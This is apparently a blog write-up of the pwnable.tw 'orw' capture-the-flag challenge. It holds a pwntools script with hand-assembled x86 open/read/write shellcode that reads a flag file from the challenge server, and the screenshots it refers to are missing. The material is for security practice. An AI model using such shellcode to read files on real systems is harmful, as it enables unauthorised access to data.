pwnable.tw

[pwnable.tw] orw writeup

st4rbuucks 2018. 10. 11. 14:37

Challenge

Solving

running binary :

and part of main disassembly :

Binary reads our payload and store it at the address 0x8048370, then it runs the code there.

As the problem description says, maybe we should make a shellcode only with open, read, write syscall.

Here is my python script

#!/usr/bin/env python
# pwnable.tw orw

from pwn import *

debug = 0

def exploit():
	shellcode = ''
	shellcode += asm('mov eax, 0x5')		# syscall : open
	shellcode += asm('mov ebx, 0x804a09c')	# filename
	shellcode += asm('mov ecx, 0x0')		# flags
	shellcode += asm('mov edx, 0x804a0ab')	# mode
	shellcode += asm('int 0x80')
	shellcode += asm('mov ebx, eax')		# fd
	shellcode += asm('mov eax, 0x3')		# syscall : read
	shellcode += asm('mov ecx, 0x804a100')	# buf
	shellcode += asm('mov edx, 0x64')		# count
	shellcode += asm('int 0x80')
	shellcode += asm('mov edx, eax')		# count
	shellcode += asm('mov eax, 0x4')		# syscall : write
	shellcode += asm('mov ebx, 0x1')		# fd
	shellcode += asm('mov ecx, 0x804a100')	# buf
	shellcode += asm('int 0x80')
	shellcode += '/home/orw/flag\x00'
	shellcode += 'r\x00'
	s.send(shellcode)

if __name__ == '__main__':
	if debug:
		s = process('./orw')
		pause()
	else:
		s = remote('chall.pwnable.tw', 10001)

	exploit()
	s.interactive()
	s.close()

FL4G

저작자표시